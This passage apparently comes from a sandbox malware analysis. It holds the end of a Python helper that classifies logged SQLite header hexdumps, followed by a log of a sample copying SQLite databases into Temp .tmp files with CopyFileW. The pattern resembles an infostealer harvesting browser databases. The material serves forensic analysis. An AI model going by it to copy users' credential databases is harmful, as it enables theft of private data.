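    """Classify one File Written row: SQLite copy or not, and complete or not."""
    data = bytes.fromhex(hexdump.replace(" ", ""))
    if not data.startswith(SQLITE_MAGIC):
        return {"path": path, "sqlite": False, "complete": False}
    header = parse_sqlite_header(data)
    return {
        "path": path,
        "sqlite": True,
        "header": header,
        "logged_length": logged_length,
        "expected_size": header["expected_size"],
        "complete": header["expected_size"] == logged_length,
    }


def sqlite_copies(rows) -> list:
    """Only the rows that are complete copies of a SQLite database."""
    return [r for r in (check_write(*row) for row in rows) if r["sqlite"] and r["complete"]]


if __name__ == "__main__":
    for row in SAMPLE_WRITES:
        print(check_write(*row))
```

When a sandbox logs only the first bytes of a write, this header check is often the only way to tell a full database copy from a truncated read, and the schema cookie and change counter let you match the copies back to the originals on the victim machine.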
File Written
File Path   Offset   Length   Value   Ascii   Completion   Count   Source Address   Symbol
C:\Users\user\AppData\Local\Temp\tmp6222.tmp
0 40960 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 15 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 2e 43 fd 05 00 00 00 01 07 fd 00 00 00 00 10 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ .C   success or wait   1   3E6803   CopyFileW
C:\Users\user\AppData\Local\Temp\tmp62EE.tmp
0 40960 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 15 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 2e 43 fd 05 00 00 00 01 07 fd 00 00 00 00 10 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ .C   success or wait   1   3E6803   CopyFileW
C:\Users\user\AppData\Local\Temp\tmp6417.tmp
0 40960 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 15 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 2e 43 fd 05 00 00 00 01 07 fd 00 00 00 00 10 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ .C   success or wait   1   3E6803   CopyFileW
C:\Users\user\AppData\Local\Temp\tmp64E3.tmp
0 40960 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 15 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 2e 43 fd 05 00 00 00 01 07 fd 00 00 00 00 10 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ .C   success or wait   1   3E6803   CopyFileW
C:\Users\user\AppData\Local\Temp\tmp66A8.tmp
0 40960 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 15 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 2e 43 fd 05 00 00 00 01 07 fd 00 00 00 00 10 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ .C   success or wait   1   3E6803   CopyFileW
C:\Users\user\AppData\Local\Temp\tmp67A3.tmp
0 40960 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 15 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 2e 43 fd 05 00 00 00 01 07 fd 00 00 00 00 10 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ .C success or wait 1 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp6AC0.tmp
0 28672 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 10 00 01 01 00 40 20 20 00 00 00 09 00 00 00 07 00 00 00 07 00 00 00 02 00 00 00 0d 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 2e 43 fd 0d 0d 2e 00 04 0c fd 00 0f 67 0f fd 0d 4e 0c fd 0c fd 0c fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ .C.gN success or wait 1 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp6C85.tmp
0 28672 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 10 00 01 01 00 40 20 20 00 00 00 09 00 00 00 07 00 00 00 07 00 00 00 02 00 00 00 0d 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 2e 43 fd 0d 0d 2e 00 04 0c fd 00 0f 67 0f fd 0d 4e 0c fd 0c fd 0c fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ .C.gN success or wait 1 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp7108.tmp
0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 04 00 00 00 25 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 43 fd 05 00 00 00 03 07 fd 00 00 00 00 1f 07 fd 07 fd 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp71C5.tmp
0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 04 00 00 00 25 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 43 fd 05 00 00 00 03 07 fd 00 00 00 00 1f 07 fd 07 fd 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp72BF.tmp
0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 04 00 00 00 25 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 43 fd 05 00 00 00 03 07 fd 00 00 00 00 1f 07 fd 07 fd 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp738B.tmp
0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 04 00 00 00 25 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 43 fd 05 00 00 00 03 07 fd 00 00 00 00 1f 07 fd 07 fd 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp7486.tmp
0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 04 00 00 00 25 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 43 fd 05 00 00 00 03 07 fd 00 00 00 00 1f 07 fd 07 fd 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp7551.tmp
0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 04 00 00 00 25 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 43 fd 05 00 00 00 03 07 fd 00 00 00 00 1f 07 fd 07 fd 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp764C.tmp
0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 04 00 00 00 25 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 43 fd 05 00 00 00 03 07 fd 00 00 00 00 1f 07 fd 07 fd 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp7718.tmp
0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 04 00 00 00 25 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 43 fd 05 00 00 00 03 07 fd 00 00 00 00 1f 07 fd 07 fd 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp7841.tmp
0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 04 00 00 00 25 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 43 fd 05 00 00 00 03 07 fd 00 00 00 00 1f 07 fd 07 fd 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp790D.tmp
0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 04 00 00 00 25 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 43 fd 05 00 00 00 03 07 fd 00 00 00 00 1f 07 fd 07 fd 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp79D9.tmp
0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 04 00 00 00 25 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 43 fd 05 00 00 00 03 07 fd 00 00 00 00 1f 07 fd 07 fd 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp7AA5.tmp
0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 04 00 00 00 25 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 43 fd 05 00 00 00 03 07 fd 00 00 00 00 1f 07 fd 07 fd 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp7BCE.tmp
0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 fd 00 02 02 00 40 20 20 00 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 09 28 0d 7f fd 00 03 7d fd 00 7e 1d 7f fd 7d fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ .(}~} success or wait 8 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp7CF7.tmp
0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 fd 00 02 02 00 40 20 20 00 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 09 28 0d 7f fd 00 03 7d fd 00 7e 1d 7f fd 7d fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ .(}~} success or wait 8 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp533A.tmp
0 1026 41 49 58 41 43 56 59 42 53 42 43 5a 44 4a 4d 5a 55 44 56 4e 45 43 4d 46 53 47 4a 53 41 4f 41 49 58 43 4a 46 44 50 48 51 4a 56 55 41 4e 55 46 46 50 51 58 56 59 4a 52 55 47 59 50 4a 47 4b 45 4a 4e 58 43 42 54 58 41 52 41 45 54 41 4b 46 54 4a 4b 56 4c 49 5a 45 58 4c 4d 4f 41 50 56 45 5a 52 5a 5a 55 49 52 44 55 4b 53 50 5a 52 42 50 49 4e 4e 45 4b 4c 43 4c 58 42 48 46 5a 4d 42 52 4a 54 55 4a 5a 54 52 43 47 51 47 46 52 51 43 45 56 50 55 42 41 41 50 42 48 42 54 59 59 48 44 4a 5a 48 48 50 4d 46 41 4b 58 56 4a 50 51 52 51 43 52 55 46 59 50 4d 4e 55 43 52 52 51 4f 59 58 59 45 48 58 51 45 48 57 48 46 4c 5a 53 42 4d 4c 52 52 5a 46 4c 4c 59 55 51 4c 41 44 54 4b 45 44 58 56 44 4c 4b 4c 50 5a 54 54 43 4e 41 58 4d 58 50 53 54 43 48 51 4b 57 4d 53 52 50 4e 52 5a 47 55 4c
AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGUL
success or wait 1 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp3E26.tmp
0 1026 4e 48 50 4b 49 5a 55 55 53 47 45 52 51 53 4c 42 47 53 45 41 56 58 47 4e 44 57 58 4e 48 52 49 4d 47 4b 51 5a 49 59 47 4d 4e 41 4b 4c 44 53 44 4c 4d 5a 54 53 48 57 4e 51 53 4d 52 4c 54 4f 58 4b 49 51 56 5a 57 50 54 50 4d 59 47 43 43 43 54 4f 51 4d 4f 46 47 50 59 56 56 43 43 55 44 4f 52 49 58 4d 4d 58 44 48 4b 43 45 54 55 4c 42 48 4c 4a 45 4e 41 42 45 49 4a 50 54 46 4f 48 46 50 49 55 55 53 46 50 55 48 53 42 48 45 4e 44 41 4e 46 4d 4f 59 5a 52 5a 41 58 59 56 46 45 5a 49 4b 44 4b 55 45 56 5a 41 57 45 46 4b 52 54 55 4a 5a 50 46 55 44 4d 45 5a 5a 51 56 42 47 59 4d 4d 49 48 4b 45 42 59 4a 4d 4a 4d 54 54 58 53 44 54 44 51 41 55 41 54 58 4c 41 42 4c 42 45 4a 55 42 42 50 53 58 5a 50 58 4d 48 56 4e 48 4f 48 59 50 4b 43 59 4c 44 56 47 4a 53 42 50 45 58 57 47 59 56 50
